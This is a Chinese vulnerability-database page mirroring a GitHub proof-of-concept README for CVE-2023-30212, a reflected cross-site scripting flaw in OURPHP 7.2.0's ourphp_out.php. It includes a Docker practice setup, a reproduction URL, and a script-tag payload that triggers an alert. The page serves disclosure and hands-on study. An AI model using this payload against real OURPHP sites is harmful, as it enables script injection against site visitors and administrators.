POC详情: 0ebc3c10f0956d34945f57f6ddc9584860c4e69c

来源
https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE
关联漏洞
标题: OURPHP 跨站脚本漏洞 (CVE-2023-30212)
描述:OURPHP是OURPHP开源的一个开源、跨平台、企业级+电商+小程序+APP多终端同步的CMS建站系统。 OURPHP 7.2.0版本及之前版本存在安全漏洞,该漏洞源于通过文件ourphp_out.php发现包含跨站脚本(XSS)漏洞。
描述
This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.
介绍
# CVE-2023-30212 POC : Cross-Site Scripting
#### via /client/manage/ourphp_out.php

## Products Affected By CVE-2023-30212 :

| Vendor          | Product         | Version |
|:--------:       |:--------:       |:--------:|
| ourphp          | ourphp          |  7.2.0   |

## Docker Installation Guide :

To install OURPHP <= 7.2.0 in docker you can use [guide ](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE/blob/main/Docker%20Setup%20for%20vulnerability%20CVE-2023-30212%20.pdf) to install docker for practice purpose.


## Explaination of Vulnerability:
```go
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"
```
## Steps to Reproduce the issue:
```go
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
```
## Payload for the Vulnerability:
```go
# </script><script>alert(`xss`)</script>
```
## Video
[![CVE-2023-30212](https://i.postimg.cc/sX95Ghkw/Screenshot-2023-05-25-231747.png)](https://vimeo.com/830293942?share=copy)


## References

1. [NIST](https://nvd.nist.gov/vuln/detail/CVE-2023-30212)
2. [cve.mitre.org](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30212)
3. [Ourphp =>7.2.0 --> Code for reference](https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/)
文件快照

 [4.0K]  /data/pocs/0ebc3c10f0956d34945f57f6ddc9584860c4e69c
├── [ 83K]  Docker Setup for vulnerability CVE-2023-30212 .pdf
└── [1.8K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。